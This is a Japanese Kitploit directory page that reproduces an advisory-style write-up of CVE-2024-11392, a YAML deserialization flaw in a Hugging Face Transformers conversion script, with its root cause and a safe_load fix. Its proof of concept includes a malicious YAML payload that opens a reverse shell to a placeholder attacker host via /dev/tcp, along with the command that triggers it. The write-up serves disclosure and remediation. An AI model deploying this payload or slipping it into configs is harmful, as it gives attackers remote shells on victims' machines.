Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-11392 — CVE-2024-11392 の技術的詳細とエクスプロイト | Kitploit
ツール/GitHubGitHub/piyush-bhor/cve-2024-11392
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発
GitHubpiyush-bhor/cve-2024-11392

CVE-2024-11392

CVE-2024-11392 の技術的詳細とエクスプロイト

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-11392

Hugging Face Transformers MobileViTV2 における信頼できないデータのデシリアライゼーションによるリモートコード実行の脆弱性

脆弱性の概要と影響: この脆弱性により、攻撃者は悪意のある設定ファイルをHugging Face Transformersリポジトリの convert_mlcvnets_to_pytorch.py スクリプトに提供することで、ホストマシン上で任意のコードを実行できます。 見知らぬユーザーが悪意のある設定ファイルを伴うサードパーティモデルを使用し、convert_mlcvnets_to_pytorch.py スクリプトを実行すると、被害者のシステム上でリモートコード実行 (RCE) が発生します。

脆弱性のある製品

  • 製品: Hugging Face Transformers
  • モジュール: MobileViTV2
  • ファイル: transformers/src/transformers/models/mobilevitv2/convert_mlcvnets_to_pytorch.py
  • バージョン: 最新
  • GitHub Permalink: https://github.com/huggingface/transformers/blob/bdb9106f247fca48a71eb384be25dbbd29b065a8/src/transformers/models/mobilevitv2/convert_mlcvnets_to_pytorch.py

根本原因分析

  • 脆弱性の詳細な説明: この脆弱性は、信頼できないデータの安全でないデシリアライゼーションに起因します。スクリプトはローダー FullLoader を使用した yaml.load 関数を利用しており、これは完全なYAML言語を読み込み、コード実行に対して脆弱です。

  • 入力から脆弱な状態に至るコードフロー:

    1. ユーザーは、設定ファイルとともにサードパーティの ml-cvnet モデルをダウンロードします。
    2. ユーザーは convert_mlcvnets_to_pytorch.py スクリプトを実行し、設定ファイルを渡します。
    3. convert_mlcvnets_to_pytorch.py スクリプトは設定ファイルをデシリアライズし、悪意のあるコードを実行します。
  • インジェクションポイント: 脆弱性は、yaml.load(yaml_file, Loader=yaml.FullLoader) が呼び出される箇所で発生します。 GitHub Permalink: https://github.com/huggingface/transformers/blob/bdb9106f247fca48a71eb384be25dbbd29b065a8/src/transformers/models/mobilevitv2/convert_mlcvnets_to_pytorch.py#L57

  • 推奨される修正: yaml.load(yaml_file, Loader=yaml.FullLoader) を yaml.safe_load(yaml_file) に置き換えて、任意コードの実行を防止します。

  • 概念実証を実行する手順:

  1. 被害者のシステム上でリバースシェルを開く悪意のあるYAML設定ファイル transformers_exploit.yaml を作成します:
root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1')"
  1. convert_mlcvnets_to_pytorch.py スクリプトを実行し、--orig_config_path に transformers_exploit.yaml ファイルを渡します:
root@kitploit:~
> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --orig_config_path transformers_exploit.yaml --pytorch_dump_folder_path dummy_output --task imagenet1k_256

注: dummy_checkpoint.pt は空のファイルのままにでき、dummy_output は空のディレクトリ、task はスクリプトに記載されているオプションのいずれかを使用できます。

ソフトウェアダウンロードリンク: https://github.com/huggingface/transformers/tree/main

ツールをダウンロード